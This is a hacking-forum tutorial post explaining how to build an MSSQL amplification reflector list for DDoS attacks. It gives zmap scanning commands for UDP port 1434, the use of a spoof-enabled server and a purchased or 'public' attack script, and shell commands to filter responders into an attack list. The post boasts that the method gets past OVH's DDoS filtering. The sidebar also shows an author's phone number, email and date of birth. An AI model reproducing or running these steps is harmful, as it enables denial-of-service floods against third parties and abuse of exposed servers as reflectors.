www.i4info.org

i4info Provides the best hacking Material. Latest hacking tutorials and tools are available here. It is the best place for hackers.

Latest topics

December 2016

MonTueWedThuFriSatSun
   1234
567891011
12131415161718
19202122232425
262728293031 

Calendar Calendar

Affiliates


free forum

Forumotion on Facebook Forumotion on Twitter Forumotion on YouTubeForumotion on Google+

Visitors Counter


Flag Counter

About Author

Muhammad Shahroze Rashid
i4info
Web Developer
Web Developer & Designer,Researcher and Technical writer. An Information Security Consultant and System Auditor, a keen Security researcher.
samanabad
lahore, Punjab
54000
Pakistan
[email protected]
03064904829
DOB: 05/25/1992
Muhammad Shahroze Rashid
Muhammad Shahroze Rashid is a Web Developer and Designer, Android Developer, InfoGrapher, IT consultant and Researcher
Reviewed by Google
Google
Date published: 01/19/2016
9 / 10 stars
Muhammad Shahroze Rashid
Muhammad Shahroze Rashid Web Developer & Designer,Researcher and Technical writer. An Information Security Consultant and System Audito
samanabad
lahore
Punjab
54000
Pakistan

How to scan MSSQL amplified

Share

Admin
Admin

Posts : 451
Reputation : 5
Join date : 2014-12-10
Age : 24
Location : Pakistan

How to scan MSSQL amplified

Post by Admin on Fri Jan 02, 2015 9:51 pm

What you need:
100Mbps/1Gbps dedicated server or XEN/KVM VPS. (OpenVZ VPS's wont work)
OVH Dropper attack script: You can either buy it or find the public version. Ask a few people.
You will also need a spoofable server.
mssql_1434.pkt: [You must be registered and logged in to see this link.]
CentOS 6/7

Note* This method works very well and is super fast, its not the easiest though. MSSQL has a 10x amplification factor. It's overall a very bad amplification method but works well against protected servers such as OVH since the filter does not catch it and treats the traffic as legitimate traffic therefor allowing it to flood the port.



How to create MSSQL amplification lists



- Update your server.



Code:
<code>yum -y update</code>


- Install dependencies.



Code:
yum -y install zmap php python perl make gcc build-essential cmake libgmp3-dev libpcap-dev gengetopt byacc flex


- Download the mssql_1434.pkt and place in root directory.

- Run the zmap command.



Code:
zmap -p 1434 -M udp --probe-args=file:/root/mssql_1434.pkt -o mssql_1434.txt


Note* The scan will take 2 hours on a 1Gbps server. Please wait until its
completely finished scanning.

- Upload the mssql_1434.txt list to a spoof-enabled server

- Connect to your spoof-enabled server and install the dependencies.



Code:
yum -y install iptraf


- Run iptraf.



Code:
iptraf


- Enable logging in iptraf.



Code:
Configure > Logging (Push enter)


[Image: ywTJFIQ.png]

- Create a UDP filter in iptraf.

:


Code:
Fitlers > IP > Define new filter > Name: MSSQL > CTRL-A


[Image: sQxHbBh.png]

- Apply the filter.
- Exit the menu.
- Select "IP traffic monitor".

- Select Eth0/Eth1 or the lowest interface on the list.
[Image: 6b6WdWs.png]

- Select the location in which the log file will be stored.
[Image: 7FClobf.png]

- Open another putty session on your spoofable server.

- Use the MSSQL/OVH dropper attack script and attack your own server using the mssql_1434.txt you made ealier.
Note* Change the IP 1.1.1.1 to what ever your spoofable servers ip is.

:


Code:
./mssql 1.1.1.1 1434 mssql_1434.txt 1 2600


- In iptraf you should see a bunch of IPs incoming.

- Once the attack is over close iptraf.



Code:
CTRL X


- Change to the directory where your iptraf logfile is stored.
Note* change /root to what ever directory its stored in.

:


Code:
cd /root


- Take out all the responses that replied with over 199 bytes and store them in 200bytes.txt.

:


Code:
awk '$8 > 199' dongs.txt > 200bytes.txt


- Remove everything but the bare IPs into 200bytesips.txt.

:


Code:
grep -Eo "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" 200bytes.txt > 200bytesips.txt


- Remove duplicates and randomly sort.

:


Code:
sort 200bytesips.txt | uniq -u > 200bytescleaned.txt; sort --random-sort 200bytescleaned.txt > done.txt


Done! Enjoy your list.


More information:
- If you need help, post below.
- 200Bytes seems to work best and last the longest, I suggest messing around though.
- Server freezing? Limit the zmap bandwidth with:

Code:


Code:
--bandwidth=10M


Add that behind the port. 10M = 100Mbps. Change as you like.

Please leave a thanks if you enjoyed this tutorial.

This is for educational purposes only.

    Current date/time is Tue Dec 06, 2016 6:56 pm